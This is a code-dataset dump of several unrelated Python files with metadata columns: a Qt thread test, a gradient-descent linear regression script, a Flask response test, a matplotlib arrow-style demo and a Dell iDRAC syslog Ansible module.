self.on_thread_side_called = self.on_thread_side_called + 1
def on_gui_side(self):
""" Executed when the message has reached GUI side. """
self.on_on_gui_side = self.on_on_gui_side + 1
class TestTestee(TestCase):
def setUp(self):
self.plugin = MagicMock()
self.app = QCoreApplication([])
self.thread = WorkerThread(self.plugin)
self.testee = GuiSide()
self.testee.tie(self.thread)
self.thread.start()
sleep(0.5)
self.testee.receiver()
def tearDown(self):
self.thread.stop.set()
self.testee = None
self.app.exit()
def test_init(self):
logger.debug("Run GuiSide/ThreadSide test starting")
self.app.processEvents(QEventLoop.AllEvents, 1)
sleep(0.2)
self.assertEqual(self.thread.state, self.thread.STATE_CONNECTED)
msg = AMessage(self.plugin, self.thread)
self.assertIsNotNone(msg.message_id)
self.thread.send_to_gui(msg)
sleep(0.2)
self.testee.receiver()
self.app.processEvents(QEventLoop.AllEvents, 1)
self.assertEqual(msg.on_thread_side_called, 1)
self.assertEqual(msg.on_thread_side_called, 1)
msg = AMessage(self.plugin, self.thread)
self.assertIsNotNone(msg.message_id)
self.thread.send_to_gui(msg)
sleep(0.2)
self.testee.receiver()
self.app.processEvents(QEventLoop.AllEvents, 1)
self.assertEqual(msg.on_thread_side_called, 1)
self.assertEqual(msg.on_thread_side_called, 1)
logger.debug("Run GuiSide/ThreadSide test ends")
| en | 0.91894 | # -*- coding: utf-8 -*- # Set this to terminate the thread. Executed just before the messages leaves the thread side. Executed when the message has reached GUI side. | 2.193917 | 2 |
Algorithms/Linear Regression/LinearRegression.py | alex0019/ML-Algorithms | 7 | 6632532 | <gh_stars>1-10
############################################################################################################################
'''
Linear Regression implementation in Python 3
By - <NAME>
- Using Gradient descent algorithm for finding parameter values.
- Without regularization.
:: Variables used ::
1) data :- This variable is used for storing data fetch from dataset file.
2) x,y :- 'x' and 'y' is used for storing coloumns data of dataset file in seprate variables.
3) theta0, theta1 :- These are the parameters used in hypothesis function. (Initialized with 0)
4) i :- For counting number of iterations done for calculating gradient decent and cost function.
5) min_j :- It stores the value return by cost function after passing latest values of theta0 and theta1.
6) m :- For counting number of training data.(Total number of rows)
7) j :- For counting number of training data which has been used for evaluation of gradient function.
8) hypo :- For calculating hypothesis value (i.e h THETA (x) = theta0 + theta1*x).
9) cost_func0 :- This is used to store cost function value for gradient descent of theta0.
10) cost_func1 :-This is used to store cost function value for gradient descent of theta1.
(There are two cost function variables because they calculate different values. As given in
the formaule of gradient decent for theat1 it ends up with product of 'x' which is not in
case of calculating gradient descent for theat0)
11) alpha :- It is used for storing learning rate of gradient descent.
12) k :- For counting number of training data which has been used for evaluation of Cost function.
13) mini :- This stores the value of cost function after minimization.
:: Functions used ::
1) gradient_decent() :- This fucntion is used for calculating the parameter valuese by using gradient descent algorithm.
It returns two theta values(theta0,theta1) which is calculated.
2) cost_function() :- This function is used for calculating the cost function or squared mean error.
'''
##################################################################################################################################
import pandas as pd # Importing required modules
import matplotlib.pyplot as plt
import numpy as np
def gradient_decent(x,y,theta0,theta1): # This fucntion will calculate parameter values using gradient descent algorithm.
m = len(x) # Initializing total number of training data.
j=0 # Initializing counter for counting number of training data which has been used in calculating parameter values.
hypo = 0 # Initializing variable for storing hypothesis equation value.
cost_func0 = 0 # Initializing for storing cost function values.
cost_func1 = 0
alpha = 0.01 # Initializing learing rate for gradient descent algorithm.
while j<m: # finding sum of all the derivatives for calculating gradient descent.
hypo = theta0 + theta1*x[j]
cost_func0 = cost_func0 + (hypo - y[j])
cost_func1 = cost_func1 + (hypo - y[j])*x[j]
j+=1
cost_func0 = (1/m) * cost_func0 # Finding the average of the calculated derivatives by dviding it by 'm'
cost_func1 = (1/m) * cost_func1
theta0 = theta0 - alpha * cost_func0 # Finally calculating values of theta0 and theta1 and then returning it.
theta1 = theta1 - alpha * cost_func1
return theta0,theta1
def cost_function(x,y,theta0,theta1): # This function is used for calculating Mean squared error or for minimization of cost function value.
m = len(x)
k=0
hypo = 0
mini = 0 # This will store the calculated minimized value of cost function.
while k<m: # calculating sumation of all the diffences between calculated hypothesis value and the actual yalue (i.e (h Theta (x) - y)^2)
hypo = theta0 + theta1 * x[k]
mini = mini + np.power((hypo - y[k]),2)
k+=1
mini = mini/(2*m) # calculating average of the summed cost function value by dviding it with '2*m' and then returning the value.
return mini
if __name__ == '__main__':
data = pd.read_csv('../../Datasets/linearRegression_Dataset.txt', header = None) #Loading dataset file and storing in 'data' variable.
x = data.iloc[:,0] #sepratly storing the coloumn 0 in x.
y = data.iloc[:,1] #sepratly storing the coloumn 1 in y.
theta0 = 0 #Initializing theta values with '0'.
theta1 = 0
i=0 #Initializing the iteration counter.
while(i<=1500): #Using iteration for finding the global minimum state and will consider the 1500'th iteration returning value as parameter value.
theta0,theta1 = gradient_decent(x,y,theta0,theta1) # Calling gradient_decent function which will return updatae theta values based on earlier values of theta.
min_j = cost_function(x,y,theta0,theta1) # Calling cost_function for calculating squared mean error for the new value.
i+=1
print("Theta :: %.3f %.3f " %(theta0,theta1)) # Displaying the values of theta which will be used for computation of hypothesis function.
print("Cost value :: ",min_j) # Displaying the minimum cost function for final values of theta0 and theta1
plt.scatter(x,y) # Ploting graph of dataset and the hypothesis function.
plt.xlabel(" X axis")
plt.ylabel(" Y axis")
plt.plot(x,np.dot(x,theta1))
plt.show()
| ############################################################################################################################
'''
Linear Regression implementation in Python 3
By - <NAME>
- Using Gradient descent algorithm for finding parameter values.
- Without regularization.
:: Variables used ::
1) data :- This variable is used for storing data fetch from dataset file.
2) x,y :- 'x' and 'y' is used for storing coloumns data of dataset file in seprate variables.
3) theta0, theta1 :- These are the parameters used in hypothesis function. (Initialized with 0)
4) i :- For counting number of iterations done for calculating gradient decent and cost function.
5) min_j :- It stores the value return by cost function after passing latest values of theta0 and theta1.
6) m :- For counting number of training data.(Total number of rows)
7) j :- For counting number of training data which has been used for evaluation of gradient function.
8) hypo :- For calculating hypothesis value (i.e h THETA (x) = theta0 + theta1*x).
9) cost_func0 :- This is used to store cost function value for gradient descent of theta0.
10) cost_func1 :-This is used to store cost function value for gradient descent of theta1.
(There are two cost function variables because they calculate different values. As given in
the formaule of gradient decent for theat1 it ends up with product of 'x' which is not in
case of calculating gradient descent for theat0)
11) alpha :- It is used for storing learning rate of gradient descent.
12) k :- For counting number of training data which has been used for evaluation of Cost function.
13) mini :- This stores the value of cost function after minimization.
:: Functions used ::
1) gradient_decent() :- This fucntion is used for calculating the parameter valuese by using gradient descent algorithm.
It returns two theta values(theta0,theta1) which is calculated.
2) cost_function() :- This function is used for calculating the cost function or squared mean error.
'''
##################################################################################################################################
import pandas as pd # Importing required modules
import matplotlib.pyplot as plt
import numpy as np
def gradient_decent(x,y,theta0,theta1): # This fucntion will calculate parameter values using gradient descent algorithm.
m = len(x) # Initializing total number of training data.
j=0 # Initializing counter for counting number of training data which has been used in calculating parameter values.
hypo = 0 # Initializing variable for storing hypothesis equation value.
cost_func0 = 0 # Initializing for storing cost function values.
cost_func1 = 0
alpha = 0.01 # Initializing learing rate for gradient descent algorithm.
while j<m: # finding sum of all the derivatives for calculating gradient descent.
hypo = theta0 + theta1*x[j]
cost_func0 = cost_func0 + (hypo - y[j])
cost_func1 = cost_func1 + (hypo - y[j])*x[j]
j+=1
cost_func0 = (1/m) * cost_func0 # Finding the average of the calculated derivatives by dviding it by 'm'
cost_func1 = (1/m) * cost_func1
theta0 = theta0 - alpha * cost_func0 # Finally calculating values of theta0 and theta1 and then returning it.
theta1 = theta1 - alpha * cost_func1
return theta0,theta1
def cost_function(x,y,theta0,theta1): # This function is used for calculating Mean squared error or for minimization of cost function value.
m = len(x)
k=0
hypo = 0
mini = 0 # This will store the calculated minimized value of cost function.
while k<m: # calculating sumation of all the diffences between calculated hypothesis value and the actual yalue (i.e (h Theta (x) - y)^2)
hypo = theta0 + theta1 * x[k]
mini = mini + np.power((hypo - y[k]),2)
k+=1
mini = mini/(2*m) # calculating average of the summed cost function value by dviding it with '2*m' and then returning the value.
return mini
if __name__ == '__main__':
data = pd.read_csv('../../Datasets/linearRegression_Dataset.txt', header = None) #Loading dataset file and storing in 'data' variable.
x = data.iloc[:,0] #sepratly storing the coloumn 0 in x.
y = data.iloc[:,1] #sepratly storing the coloumn 1 in y.
theta0 = 0 #Initializing theta values with '0'.
theta1 = 0
i=0 #Initializing the iteration counter.
while(i<=1500): #Using iteration for finding the global minimum state and will consider the 1500'th iteration returning value as parameter value.
theta0,theta1 = gradient_decent(x,y,theta0,theta1) # Calling gradient_decent function which will return updatae theta values based on earlier values of theta.
min_j = cost_function(x,y,theta0,theta1) # Calling cost_function for calculating squared mean error for the new value.
i+=1
print("Theta :: %.3f %.3f " %(theta0,theta1)) # Displaying the values of theta which will be used for computation of hypothesis function.
print("Cost value :: ",min_j) # Displaying the minimum cost function for final values of theta0 and theta1
plt.scatter(x,y) # Ploting graph of dataset and the hypothesis function.
plt.xlabel(" X axis")
plt.ylabel(" Y axis")
plt.plot(x,np.dot(x,theta1))
plt.show() | en | 0.689926 | ############################################################################################################################ Linear Regression implementation in Python 3 By - <NAME> - Using Gradient descent algorithm for finding parameter values. - Without regularization. :: Variables used :: 1) data :- This variable is used for storing data fetch from dataset file. 2) x,y :- 'x' and 'y' is used for storing coloumns data of dataset file in seprate variables. 3) theta0, theta1 :- These are the parameters used in hypothesis function. (Initialized with 0) 4) i :- For counting number of iterations done for calculating gradient decent and cost function. 5) min_j :- It stores the value return by cost function after passing latest values of theta0 and theta1. 6) m :- For counting number of training data.(Total number of rows) 7) j :- For counting number of training data which has been used for evaluation of gradient function. 8) hypo :- For calculating hypothesis value (i.e h THETA (x) = theta0 + theta1*x). 9) cost_func0 :- This is used to store cost function value for gradient descent of theta0. 10) cost_func1 :-This is used to store cost function value for gradient descent of theta1. (There are two cost function variables because they calculate different values. As given in the formaule of gradient decent for theat1 it ends up with product of 'x' which is not in case of calculating gradient descent for theat0) 11) alpha :- It is used for storing learning rate of gradient descent. 12) k :- For counting number of training data which has been used for evaluation of Cost function. 13) mini :- This stores the value of cost function after minimization. :: Functions used :: 1) gradient_decent() :- This fucntion is used for calculating the parameter valuese by using gradient descent algorithm. It returns two theta values(theta0,theta1) which is calculated. 2) cost_function() :- This function is used for calculating the cost function or squared mean error. ################################################################################################################################## # Importing required modules # This fucntion will calculate parameter values using gradient descent algorithm. # Initializing total number of training data. # Initializing counter for counting number of training data which has been used in calculating parameter values. # Initializing variable for storing hypothesis equation value. # Initializing for storing cost function values. # Initializing learing rate for gradient descent algorithm. # finding sum of all the derivatives for calculating gradient descent. # Finding the average of the calculated derivatives by dviding it by 'm' # Finally calculating values of theta0 and theta1 and then returning it. # This function is used for calculating Mean squared error or for minimization of cost function value. # This will store the calculated minimized value of cost function. # calculating sumation of all the diffences between calculated hypothesis value and the actual yalue (i.e (h Theta (x) - y)^2) # calculating average of the summed cost function value by dviding it with '2*m' and then returning the value. #Loading dataset file and storing in 'data' variable. #sepratly storing the coloumn 0 in x. #sepratly storing the coloumn 1 in y. #Initializing theta values with '0'. #Initializing the iteration counter. #Using iteration for finding the global minimum state and will consider the 1500'th iteration returning value as parameter value. # Calling gradient_decent function which will return updatae theta values based on earlier values of theta. # Calling cost_function for calculating squared mean error for the new value. # Displaying the values of theta which will be used for computation of hypothesis function. # Displaying the minimum cost function for final values of theta0 and theta1 # Ploting graph of dataset and the hypothesis function. | 3.881946 | 4 |
tests/lowball/builtins/response_class/test_response_class.py | EmersonElectricCo/lowball | 3 | 6632533 | import json
from flask import Response
from lowball.builtins.response_class import LowballResponse
class TestLowballResponseClassForceType:
def test_forces_type_properly_for_dicts(self, dict_return_value, client_with_response_class, expected_dict_return):
forced_response = LowballResponse.force_type(dict_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == expected_dict_return
def test_forces_type_properly_for_sequence_types(self, sequence_return_value, client_with_response_class):
forced_response = LowballResponse.force_type(sequence_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == b'[1,2,3]\n'
def test_forces_type_properly_for_ints(self, int_return_value):
forced_response = LowballResponse.force_type(int_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(int_return_value).encode()
def test_forces_type_properly_for_floats(self, float_return_value):
forced_response = LowballResponse.force_type(float_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(float_return_value).encode()
def test_forces_type_properly_for_complex_type(self, complex_return_value):
forced_response = LowballResponse.force_type(complex_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(complex_return_value).encode()
def test_forces_type_properly_for_memoryviews(self, memoryview_return_value):
forced_response = LowballResponse.force_type(memoryview_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == bytes(memoryview_return_value)
def test_passes_response_object_to_super(self, response_return_value, mocked_response_force_type):
forced_response = LowballResponse.force_type(response_return_value)
assert isinstance(forced_response, LowballResponse)
Response.force_type.assert_called_once_with(response=response_return_value, environ=None)
| import json
from flask import Response
from lowball.builtins.response_class import LowballResponse
class TestLowballResponseClassForceType:
def test_forces_type_properly_for_dicts(self, dict_return_value, client_with_response_class, expected_dict_return):
forced_response = LowballResponse.force_type(dict_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == expected_dict_return
def test_forces_type_properly_for_sequence_types(self, sequence_return_value, client_with_response_class):
forced_response = LowballResponse.force_type(sequence_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == b'[1,2,3]\n'
def test_forces_type_properly_for_ints(self, int_return_value):
forced_response = LowballResponse.force_type(int_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(int_return_value).encode()
def test_forces_type_properly_for_floats(self, float_return_value):
forced_response = LowballResponse.force_type(float_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(float_return_value).encode()
def test_forces_type_properly_for_complex_type(self, complex_return_value):
forced_response = LowballResponse.force_type(complex_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(complex_return_value).encode()
def test_forces_type_properly_for_memoryviews(self, memoryview_return_value):
forced_response = LowballResponse.force_type(memoryview_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == bytes(memoryview_return_value)
def test_passes_response_object_to_super(self, response_return_value, mocked_response_force_type):
forced_response = LowballResponse.force_type(response_return_value)
assert isinstance(forced_response, LowballResponse)
Response.force_type.assert_called_once_with(response=response_return_value, environ=None)
| none | 1 | 2.67082 | 3 |
|
matplotlib_examples/examples_src/pylab_examples/fancyarrow_demo.py | xzlmark/webspider | 3 | 6632534 | <filename>matplotlib_examples/examples_src/pylab_examples/fancyarrow_demo.py
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
styles = mpatches.ArrowStyle.get_styles()
ncol = 2
nrow = (len(styles) + 1) // ncol
figheight = (nrow + 0.5)
fig1 = plt.figure(1, (4.*ncol/1.5, figheight/1.5))
fontsize = 0.2 * 70
ax = fig1.add_axes([0, 0, 1, 1], frameon=False, aspect=1.)
ax.set_xlim(0, 4*ncol)
ax.set_ylim(0, figheight)
def to_texstring(s):
s = s.replace("<", r"$<$")
s = s.replace(">", r"$>$")
s = s.replace("|", r"$|$")
return s
for i, (stylename, styleclass) in enumerate(sorted(styles.items())):
x = 3.2 + (i//nrow)*4
y = (figheight - 0.7 - i % nrow) # /figheight
p = mpatches.Circle((x, y), 0.2)
ax.add_patch(p)
ax.annotate(to_texstring(stylename), (x, y),
(x - 1.2, y),
#xycoords="figure fraction", textcoords="figure fraction",
ha="right", va="center",
size=fontsize,
arrowprops=dict(arrowstyle=stylename,
patchB=p,
shrinkA=5,
shrinkB=5,
fc="k", ec="k",
connectionstyle="arc3,rad=-0.05",
),
bbox=dict(boxstyle="square", fc="w"))
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
plt.draw()
plt.show()
| <filename>matplotlib_examples/examples_src/pylab_examples/fancyarrow_demo.py
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
styles = mpatches.ArrowStyle.get_styles()
ncol = 2
nrow = (len(styles) + 1) // ncol
figheight = (nrow + 0.5)
fig1 = plt.figure(1, (4.*ncol/1.5, figheight/1.5))
fontsize = 0.2 * 70
ax = fig1.add_axes([0, 0, 1, 1], frameon=False, aspect=1.)
ax.set_xlim(0, 4*ncol)
ax.set_ylim(0, figheight)
def to_texstring(s):
s = s.replace("<", r"$<$")
s = s.replace(">", r"$>$")
s = s.replace("|", r"$|$")
return s
for i, (stylename, styleclass) in enumerate(sorted(styles.items())):
x = 3.2 + (i//nrow)*4
y = (figheight - 0.7 - i % nrow) # /figheight
p = mpatches.Circle((x, y), 0.2)
ax.add_patch(p)
ax.annotate(to_texstring(stylename), (x, y),
(x - 1.2, y),
#xycoords="figure fraction", textcoords="figure fraction",
ha="right", va="center",
size=fontsize,
arrowprops=dict(arrowstyle=stylename,
patchB=p,
shrinkA=5,
shrinkB=5,
fc="k", ec="k",
connectionstyle="arc3,rad=-0.05",
),
bbox=dict(boxstyle="square", fc="w"))
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
plt.draw()
plt.show()
| en | 0.187068 | # /figheight #xycoords="figure fraction", textcoords="figure fraction", | 2.349293 | 2 |
venv/lib/python3.6/site-packages/ansible_collections/dellemc/openmanage/plugins/modules/idrac_syslog.py | usegalaxy-no/usegalaxy | 1 | 6632535 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Dell EMC OpenManage Ansible Modules
# Version 3.5.0
# Copyright (C) 2018-2021 Dell Inc. or its subsidiaries. All Rights Reserved.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
---
module: idrac_syslog
short_description: Enable or disable the syslog on iDRAC
version_added: "2.1.0"
description:
- This module allows to enable or disable the iDRAC syslog.
extends_documentation_fragment:
- dellemc.openmanage.idrac_auth_options
- dellemc.openmanage.network_share_options
options:
syslog:
description: Enables or disables an iDRAC syslog.
choices: [Enabled, Disabled]
type: str
default: Enabled
requirements:
- "omsdk"
- "python >= 2.7.5"
author:
- "<NAME> (@felixs88)"
- "<NAME> (@anooja-vardhineni)"
notes:
- This module requires 'Administrator' privilege for I(idrac_user).
- Run this module from a system that has direct access to Dell EMC iDRAC.
- This module supports C(check_mode).
"""
EXAMPLES = """
---
- name: Enable iDRAC syslog
dellemc.openmanage.idrac_syslog:
idrac_ip: "192.168.0.1"
idrac_user: "user_name"
idrac_password: "<PASSWORD>"
share_name: "192.168.0.2:/share"
share_password: "<PASSWORD>"
share_user: "share_user_name"
share_mnt: "/mnt/share"
syslog: "Enabled"
- name: Disable iDRAC syslog
dellemc.openmanage.idrac_syslog:
idrac_ip: "192.168.0.1"
idrac_user: "user_name"
idrac_password: "<PASSWORD>"
share_name: "192.168.0.2:/share"
share_password: "<PASSWORD>"
share_user: "share_user_name"
share_mnt: "/mnt/share"
syslog: "Disabled"
"""
RETURN = r'''
---
msg:
description: Overall status of the syslog export operation.
returned: always
type: str
sample: "Successfully fetch the syslogs."
syslog_status:
description: Job details of the syslog operation.
returned: success
type: dict
sample: {
"@odata.context": "/redfish/v1/$metadata#DellJob.DellJob",
"@odata.id": "/redfish/v1/Managers/iDRAC.Embedded.1/Jobs/JID_852940632485",
"@odata.type": "#DellJob.v1_0_2.DellJob",
"CompletionTime": "2020-03-27T02:27:45",
"Description": "Job Instance",
"EndTime": null,
"Id": "JID_852940632485",
"JobState": "Completed",
"JobType": "ImportConfiguration",
"Message": "Successfully imported and applied Server Configuration Profile.",
"MessageArgs": [],
"<EMAIL>": 0,
"MessageId": "SYS053",
"Name": "Import Configuration",
"PercentComplete": 100,
"StartTime": "TIME_NOW",
"Status": "Success",
"TargetSettingsURI": null,
"retval": true
}
error_info:
description: Details of the HTTP Error.
returned: on HTTP error
type: dict
sample: {
"error": {
"code": "Base.1.0.GeneralError",
"message": "A general error has occurred. See ExtendedInfo for more information.",
"@Message.ExtendedInfo": [
{
"MessageId": "GEN1234",
"RelatedProperties": [],
"Message": "Unable to process the request because an error occurred.",
"MessageArgs": [],
"Severity": "Critical",
"Resolution": "Retry the operation. If the issue persists, contact your system administrator."
}
]
}
}
'''
import json
from ansible_collections.dellemc.openmanage.plugins.module_utils.dellemc_idrac import iDRACConnection
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.error import URLError, HTTPError
from ansible.module_utils.urls import ConnectionError, SSLValidationError
try:
from omsdk.sdkfile import file_share_manager
from omsdk.sdkcreds import UserCredentials
except ImportError:
pass
def run_setup_idrac_syslog(idrac, module):
idrac.use_redfish = True
upd_share = file_share_manager.create_share_obj(share_path=module.params['share_name'],
mount_point=module.params['share_mnt'],
isFolder=True,
creds=UserCredentials(
module.params['share_user'],
module.params['share_password']))
if not upd_share.IsValid:
module.fail_json(msg="Unable to access the share. Ensure that the share name, "
"share mount, and share credentials provided are correct.")
idrac.config_mgr.set_liason_share(upd_share)
if module.check_mode:
if module.params['syslog'] == 'Enabled':
idrac.config_mgr.enable_syslog(apply_changes=False)
elif module.params['syslog'] == 'Disabled':
idrac.config_mgr.disable_syslog(apply_changes=False)
msg = idrac.config_mgr.is_change_applicable()
else:
if module.params['syslog'] == 'Enabled':
msg = idrac.config_mgr.enable_syslog()
elif module.params['syslog'] == 'Disabled':
msg = idrac.config_mgr.disable_syslog()
return msg
def main():
module = AnsibleModule(
argument_spec={
"idrac_ip": {"required": True, "type": 'str'},
"idrac_user": {"required": True, "type": 'str'},
"idrac_password": {"required": True, "type": 'str', "aliases": ['idrac_pwd'], "no_log": True},
"idrac_port": {"required": False, "default": 443, "type": 'int'},
"share_name": {"required": True, "type": 'str'},
"share_user": {"required": False, "type": 'str'},
"share_password": {"required": False, "type": 'str', "aliases": ['share_pwd'], "no_log": True},
"share_mnt": {"required": False, "type": 'str'},
"syslog": {"required": False, "choices": ['Enabled', 'Disabled'], "default": 'Enabled'}
},
supports_check_mode=True)
try:
with iDRACConnection(module.params) as idrac:
msg = run_setup_idrac_syslog(idrac, module)
changed = False
if msg.get('Status') == "Success":
changed = True
if msg.get('Message') == "No changes found to commit!":
changed = False
except HTTPError as err:
module.fail_json(msg=str(err), error_info=json.load(err))
except URLError as err:
module.exit_json(msg=str(err), unreachable=True)
except AttributeError as err:
if "NoneType" in str(err):
module.fail_json(msg="Unable to access the share. Ensure that the share name, "
"share mount, and share credentials provided are correct.")
except (RuntimeError, SSLValidationError, ConnectionError, KeyError,
ImportError, ValueError, TypeError) as e:
module.fail_json(msg=str(e))
module.exit_json(msg="Successfully fetch the syslogs.",
syslog_status=msg, changed=changed)
if __name__ == '__main__':
main()
| #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Dell EMC OpenManage Ansible Modules
# Version 3.5.0
# Copyright (C) 2018-2021 Dell Inc. or its subsidiaries. All Rights Reserved.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
---
module: idrac_syslog
short_description: Enable or disable the syslog on iDRAC
version_added: "2.1.0"
description:
- This module allows to enable or disable the iDRAC syslog.
extends_documentation_fragment:
- dellemc.openmanage.idrac_auth_options
- dellemc.openmanage.network_share_options
options:
syslog:
description: Enables or disables an iDRAC syslog.
choices: [Enabled, Disabled]
type: str
default: Enabled
requirements:
- "omsdk"
- "python >= 2.7.5"
author:
- "<NAME> (@felixs88)"
- "<NAME> (@anooja-vardhineni)"
notes:
- This module requires 'Administrator' privilege for I(idrac_user).
- Run this module from a system that has direct access to Dell EMC iDRAC.
- This module supports C(check_mode).
"""
EXAMPLES = """
---
- name: Enable iDRAC syslog
dellemc.openmanage.idrac_syslog:
idrac_ip: "192.168.0.1"
idrac_user: "user_name"
idrac_password: "<PASSWORD>"
share_name: "192.168.0.2:/share"
share_password: "<PASSWORD>"
share_user: "share_user_name"
share_mnt: "/mnt/share"
syslog: "Enabled"
- name: Disable iDRAC syslog
dellemc.openmanage.idrac_syslog:
idrac_ip: "192.168.0.1"
idrac_user: "user_name"
idrac_password: "<PASSWORD>"
share_name: "192.168.0.2:/share"
share_password: "<PASSWORD>"
share_user: "share_user_name"
share_mnt: "/mnt/share"
syslog: "Disabled"
"""
RETURN = r'''
---
msg:
description: Overall status of the syslog export operation.
returned: always
type: str
sample: "Successfully fetch the syslogs."
syslog_status:
description: Job details of the syslog operation.
returned: success
type: dict
sample: {
"@odata.context": "/redfish/v1/$metadata#DellJob.DellJob",
"@odata.id": "/redfish/v1/Managers/iDRAC.Embedded.1/Jobs/JID_852940632485",
"@odata.type": "#DellJob.v1_0_2.DellJob",
"CompletionTime": "2020-03-27T02:27:45",
"Description": "Job Instance",
"EndTime": null,
"Id": "JID_852940632485",
"JobState": "Completed",
"JobType": "ImportConfiguration",
"Message": "Successfully imported and applied Server Configuration Profile.",
"MessageArgs": [],
"<EMAIL>": 0,
"MessageId": "SYS053",
"Name": "Import Configuration",
"PercentComplete": 100,
"StartTime": "TIME_NOW",
"Status": "Success",
"TargetSettingsURI": null,
"retval": true
}
error_info:
description: Details of the HTTP Error.
returned: on HTTP error
type: dict
sample: {
"error": {
"code": "Base.1.0.GeneralError",
"message": "A general error has occurred. See ExtendedInfo for more information.",
"@Message.ExtendedInfo": [
{
"MessageId": "GEN1234",
"RelatedProperties": [],
"Message": "Unable to process the request because an error occurred.",
"MessageArgs": [],
"Severity": "Critical",
"Resolution": "Retry the operation. If the issue persists, contact your system administrator."
}
]
}
}
'''
import json
from ansible_collections.dellemc.openmanage.plugins.module_utils.dellemc_idrac import iDRACConnection
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.error import URLError, HTTPError
from ansible.module_utils.urls import ConnectionError, SSLValidationError
try:
from omsdk.sdkfile import file_share_manager
from omsdk.sdkcreds import UserCredentials
except ImportError:
pass
def run_setup_idrac_syslog(idrac, module):
idrac.use_redfish = True
upd_share = file_share_manager.create_share_obj(share_path=module.params['share_name'],
mount_point=module.params['share_mnt'],
isFolder=True,
creds=UserCredentials(
module.params['share_user'],
module.params['share_password']))
if not upd_share.IsValid:
module.fail_json(msg="Unable to access the share. Ensure that the share name, "
"share mount, and share credentials provided are correct.")
idrac.config_mgr.set_liason_share(upd_share)
if module.check_mode:
if module.params['syslog'] == 'Enabled':
idrac.config_mgr.enable_syslog(apply_changes=False)
elif module.params['syslog'] == 'Disabled':
idrac.config_mgr.disable_syslog(apply_changes=False)
msg = idrac.config_mgr.is_change_applicable()
else:
if module.params['syslog'] == 'Enabled':
msg = idrac.config_mgr.enable_syslog()
elif module.params['syslog'] == 'Disabled':
msg = idrac.config_mgr.disable_syslog()
return msg
def main():
module = AnsibleModule(
argument_spec={
"idrac_ip": {"required": True, "type": 'str'},
"idrac_user": {"required": True, "type": 'str'},
"idrac_password": {"required": True, "type": 'str', "aliases": ['idrac_pwd'], "no_log": True},
"idrac_port": {"required": False, "default": 443, "type": 'int'},
"share_name": {"required": True, "type": 'str'},
"share_user": {"required": False, "type": 'str'},
"share_password": {"required": False, "type": 'str', "aliases": ['share_pwd'], "no_log": True},
"share_mnt": {"required": False, "type": 'str'},
"syslog": {"required": False, "choices": ['Enabled', 'Disabled'], "default": 'Enabled'}
},
supports_check_mode=True)
try:
with iDRACConnection(module.params) as idrac:
msg = run_setup_idrac_syslog(idrac, module)
changed = False
if msg.get('Status') == "Success":
changed = True
if msg.get('Message') == "No changes found to commit!":
changed = False
except HTTPError as err:
module.fail_json(msg=str(err), error_info=json.load(err))
except URLError as err:
module.exit_json(msg=str(err), unreachable=True)
except AttributeError as err:
if "NoneType" in str(err):
module.fail_json(msg="Unable to access the share. Ensure that the share name, "
"share mount, and share credentials provided are correct.")
except (RuntimeError, SSLValidationError, ConnectionError, KeyError,
ImportError, ValueError, TypeError) as e:
module.fail_json(msg=str(e))
module.exit_json(msg="Successfully fetch the syslogs.",
syslog_status=msg, changed=changed)
if __name__ == '__main__':
main()
| en | 0.547253 | #!/usr/bin/python # -*- coding: utf-8 -*- # # Dell EMC OpenManage Ansible Modules # Version 3.5.0 # Copyright (C) 2018-2021 Dell Inc. or its subsidiaries. All Rights Reserved. # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # --- module: idrac_syslog short_description: Enable or disable the syslog on iDRAC version_added: "2.1.0" description: - This module allows to enable or disable the iDRAC syslog. extends_documentation_fragment: - dellemc.openmanage.idrac_auth_options - dellemc.openmanage.network_share_options options: syslog: description: Enables or disables an iDRAC syslog. choices: [Enabled, Disabled] type: str default: Enabled requirements: - "omsdk" - "python >= 2.7.5" author: - "<NAME> (@felixs88)" - "<NAME> (@anooja-vardhineni)" notes: - This module requires 'Administrator' privilege for I(idrac_user). - Run this module from a system that has direct access to Dell EMC iDRAC. - This module supports C(check_mode). --- - name: Enable iDRAC syslog dellemc.openmanage.idrac_syslog: idrac_ip: "192.168.0.1" idrac_user: "user_name" idrac_password: "<PASSWORD>" share_name: "192.168.0.2:/share" share_password: "<PASSWORD>" share_user: "share_user_name" share_mnt: "/mnt/share" syslog: "Enabled" - name: Disable iDRAC syslog dellemc.openmanage.idrac_syslog: idrac_ip: "192.168.0.1" idrac_user: "user_name" idrac_password: "<PASSWORD>" share_name: "192.168.0.2:/share" share_password: "<PASSWORD>" share_user: "share_user_name" share_mnt: "/mnt/share" syslog: "Disabled" --- msg: description: Overall status of the syslog export operation. returned: always type: str sample: "Successfully fetch the syslogs." syslog_status: description: Job details of the syslog operation. returned: success type: dict sample: { "@odata.context": "/redfish/v1/$metadata#DellJob.DellJob", "@odata.id": "/redfish/v1/Managers/iDRAC.Embedded.1/Jobs/JID_852940632485", "@odata.type": "#DellJob.v1_0_2.DellJob", 